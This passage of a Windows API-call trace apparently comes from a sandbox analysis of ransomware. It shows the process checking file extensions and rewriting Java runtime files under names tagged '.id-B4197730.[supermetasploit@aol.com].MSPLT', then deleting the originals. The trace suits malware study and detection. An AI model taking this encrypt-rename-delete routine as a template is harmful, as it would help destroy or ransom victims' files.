lstrlenW (lpString=".xlsx") returned 5 [0300.543] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.543] lstrlenW (lpString=".ppt") returned 4 [0300.543] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.543] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.543] lstrlenW (lpString=".zip") returned 4 [0300.543] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.543] lstrlenW (lpString=".rar") returned 4 [0300.543] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.543] lstrlenW (lpString=".bz2") returned 4 [0300.543] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.543] lstrlenW (lpString=".7z") returned 3 [0300.543] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.543] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.543] lstrlenW (lpString=".dbf") returned 4 [0300.543] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.543] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.543] lstrlenW (lpString=".1cd") returned 4 [0300.543] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.543] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.543] lstrlenW (lpString=".jpg") returned 4 [0300.543] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.544] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0300.544] lstrlenW (lpString="messages_zh_CN.properties") returned 25 [0300.544] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0300.544] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=4072) returned 1 [0300.545] CloseHandle (hObject=0x47c) returned 1 [0300.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties")) returned 0x20 [0300.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0300.545] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0300.545] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.545] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.546] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0300.546] GetLastError () returned 0x0 [0300.546] ReadFile (in: hFile=0x47c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xfe8, lpOverlapped=0x0) returned 1 [0300.679] WriteFile (in: hFile=0x44c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xff0, lpOverlapped=0x0) returned 1 [0300.680] ReadFile (in: hFile=0x47c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0300.680] WriteFile (in: hFile=0x44c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x106, lpOverlapped=0x0) returned 1 [0300.680] SetEndOfFile (hFile=0x44c) returned 1 [0300.680] CloseHandle (hObject=0x44c) returned 1 [0300.681] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.681] SetEndOfFile (hFile=0x47c) returned 1 [0300.685] CloseHandle (hObject=0x47c) returned 1 [0300.685] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0300.863] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties")) returned 1 [0301.007] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.007] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.007] lstrlenW (lpString=".doc") returned 4 [0301.007] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0301.007] lstrlenW (lpString=".docx") returned 5 [0301.007] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0301.007] lstrlenW (lpString=".pdf") returned 4 [0301.007] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0301.007] lstrlenW (lpString=".xls") returned 4 [0301.008] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0301.008] lstrlenW (lpString=".xlsx") returned 5 [0301.008] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0301.008] lstrlenW (lpString=".ppt") returned 4 [0301.008] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0301.008] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.008] lstrlenW (lpString=".zip") returned 4 [0301.008] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0301.008] lstrlenW (lpString=".rar") returned 4 [0301.008] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0301.008] lstrlenW (lpString=".bz2") returned 4 [0301.008] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0301.008] lstrlenW (lpString=".7z") returned 3 [0301.008] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0301.008] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.008] lstrlenW (lpString=".dbf") returned 4 [0301.008] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0301.008] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.008] lstrlenW (lpString=".1cd") returned 4 [0301.008] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0301.008] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.008] lstrlenW (lpString=".jpg") returned 4 [0301.008] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0301.008] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.008] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.008] lstrlenW (lpString=".doc") returned 4 [0301.009] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0301.009] lstrlenW (lpString=".docx") returned 5 [0301.009] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0301.009] lstrlenW (lpString=".pdf") returned 4 [0301.009] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0301.009] lstrlenW (lpString=".xls") returned 4 [0301.009] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0301.009] lstrlenW (lpString=".xlsx") returned 5 [0301.009] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0301.009] lstrlenW (lpString=".ppt") returned 4 [0301.009] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0301.009] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.009] lstrlenW (lpString=".zip") returned 4 [0301.009] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0301.009] lstrlenW (lpString=".rar") returned 4 [0301.009] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0301.009] lstrlenW (lpString=".bz2") returned 4 [0301.009] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0301.009] lstrlenW (lpString=".7z") returned 3 [0301.009] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0301.009] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.009] lstrlenW (lpString=".dbf") returned 4 [0301.009] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0301.009] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.009] lstrlenW (lpString=".1cd") returned 4 [0301.009] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0301.009] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 71 [0301.009] lstrlenW (lpString=".jpg") returned 4 [0301.009] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0301.010] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0301.010] lstrlenW (lpString="access-bridge-64.jar") returned 20 [0301.010] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0301.511] GetFileSizeEx (in: hFile=0x4e8, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=188024) returned 1 [0301.511] CloseHandle (hObject=0x4e8) returned 1 [0301.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar")) returned 0x20 [0301.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0301.513] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0301.513] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0301.513] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0301.513] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4ec [0301.515] GetLastError () returned 0x0 [0301.515] ReadFile (in: hFile=0x4e8, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x2de78, lpOverlapped=0x0) returned 1 [0301.524] WriteFile (in: hFile=0x4ec, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x2de80, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x2de80, lpOverlapped=0x0) returned 1 [0301.529] ReadFile (in: hFile=0x4e8, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0301.529] WriteFile (in: hFile=0x4ec, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xfc, lpOverlapped=0x0) returned 1 [0301.529] SetEndOfFile (hFile=0x4ec) returned 1 [0301.530] CloseHandle (hObject=0x4ec) returned 1 [0301.536] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0301.536] SetEndOfFile (hFile=0x4e8) returned 1 [0301.545] CloseHandle (hObject=0x4e8) returned 1 [0301.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0301.546] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar")) returned 1 [0301.547] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.547] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.547] lstrlenW (lpString=".doc") returned 4 [0301.547] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0301.547] lstrlenW (lpString=".docx") returned 5 [0301.547] lstrcmpiW (lpString1=".docx", lpString2="4.jar") returned -1 [0301.547] lstrlenW (lpString=".pdf") returned 4 [0301.547] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0301.547] lstrlenW (lpString=".xls") returned 4 [0301.547] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0301.547] lstrlenW (lpString=".xlsx") returned 5 [0301.547] lstrcmpiW (lpString1=".xlsx", lpString2="4.jar") returned -1 [0301.547] lstrlenW (lpString=".ppt") returned 4 [0301.547] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0301.547] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.547] lstrlenW (lpString=".zip") returned 4 [0301.547] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0301.547] lstrlenW (lpString=".rar") returned 4 [0301.547] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0301.547] lstrlenW (lpString=".bz2") returned 4 [0301.547] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0301.547] lstrlenW (lpString=".7z") returned 3 [0301.547] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0301.547] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.547] lstrlenW (lpString=".dbf") returned 4 [0301.547] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0301.547] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.548] lstrlenW (lpString=".1cd") returned 4 [0301.548] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0301.548] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.548] lstrlenW (lpString=".jpg") returned 4 [0301.548] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0301.548] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.548] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.548] lstrlenW (lpString=".doc") returned 4 [0301.548] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0301.548] lstrlenW (lpString=".docx") returned 5 [0301.548] lstrcmpiW (lpString1=".docx", lpString2="4.jar") returned -1 [0301.548] lstrlenW (lpString=".pdf") returned 4 [0301.548] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0301.548] lstrlenW (lpString=".xls") returned 4 [0301.548] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0301.548] lstrlenW (lpString=".xlsx") returned 5 [0301.548] lstrcmpiW (lpString1=".xlsx", lpString2="4.jar") returned -1 [0301.548] lstrlenW (lpString=".ppt") returned 4 [0301.548] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0301.548] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.548] lstrlenW (lpString=".zip") returned 4 [0301.548] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0301.548] lstrlenW (lpString=".rar") returned 4 [0301.548] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0301.548] lstrlenW (lpString=".bz2") returned 4 [0301.548] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0301.548] lstrlenW (lpString=".7z") returned 3 [0301.548] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0301.548] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.548] lstrlenW (lpString=".dbf") returned 4 [0301.549] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0301.549] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.549] lstrlenW (lpString=".1cd") returned 4 [0301.549] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0301.549] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 63 [0301.549] lstrlenW (lpString=".jpg") returned 4 [0301.549] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0301.549] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0301.549] lstrlenW (lpString="cldrdata.jar") returned 12 [0301.549] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0301.550] GetFileSizeEx (in: hFile=0x4e8, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=3860502) returned 1 [0301.550] CloseHandle (hObject=0x4e8) returned 1 [0301.550] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar")) returned 0x20 [0301.550] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0301.550] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0301.550] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0301.550] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0301.550] lstrlenW (lpString=".doc") returned 4 [0301.550] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0301.550] lstrlenW (lpString=".docx") returned 5 [0301.550] lstrcmpiW (lpString1=".docx", lpString2="a.jar") returned -1 [0301.550] lstrlenW (lpString=".pdf") returned 4 [0301.550] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0301.550] lstrlenW (lpString=".xls") returned 4 [0301.550] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0301.550] lstrlenW (lpString=".xlsx") returned 5 [0301.550] lstrcmpiW (lpString1=".xlsx", lpString2="a.jar") returned -1 [0301.550] lstrlenW (lpString=".ppt") returned 4 [0301.551] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0301.551] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0301.551] lstrlenW (lpString=".zip") returned 4 [0301.551] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0301.551] lstrlenW (lpString=".rar") returned 4 [0301.551] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0301.551] lstrlenW (lpString=".bz2") returned 4 [0301.551] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0301.551] lstrlenW (lpString=".7z") returned 3 [0301.551] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0301.551] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0301.551] lstrlenW (lpString=".dbf") returned 4 [0301.551] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0301.551] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0301.551] lstrlenW (lpString=".1cd") returned 4 [0301.551] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0301.551] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0301.551] lstrlenW (lpString=".jpg") returned 4 [0301.551] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0301.551] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0301.551] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0303.388] lstrlenW (lpString=".doc") returned 4 [0303.388] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.388] lstrlenW (lpString=".docx") returned 5 [0303.388] lstrcmpiW (lpString1=".docx", lpString2="a.jar") returned -1 [0303.388] lstrlenW (lpString=".pdf") returned 4 [0303.388] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.388] lstrlenW (lpString=".xls") returned 4 [0303.388] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.388] lstrlenW (lpString=".xlsx") returned 5 [0303.388] lstrcmpiW (lpString1=".xlsx", lpString2="a.jar") returned -1 [0303.388] lstrlenW (lpString=".ppt") returned 4 [0303.388] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.388] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0303.388] lstrlenW (lpString=".zip") returned 4 [0303.388] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.388] lstrlenW (lpString=".rar") returned 4 [0303.388] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.388] lstrlenW (lpString=".bz2") returned 4 [0303.388] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.388] lstrlenW (lpString=".7z") returned 3 [0303.389] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.389] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0303.389] lstrlenW (lpString=".dbf") returned 4 [0303.389] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.389] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0303.389] lstrlenW (lpString=".1cd") returned 4 [0303.389] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.389] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 55 [0303.389] lstrlenW (lpString=".jpg") returned 4 [0303.389] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.389] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0303.389] lstrlenW (lpString="nashorn.jar") returned 11 [0303.389] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f8 [0303.391] GetFileSizeEx (in: hFile=0x4f8, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=2022734) returned 1 [0303.391] CloseHandle (hObject=0x4f8) returned 1 [0303.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar")) returned 0x20 [0303.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.392] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0303.392] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.392] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.392] lstrlenW 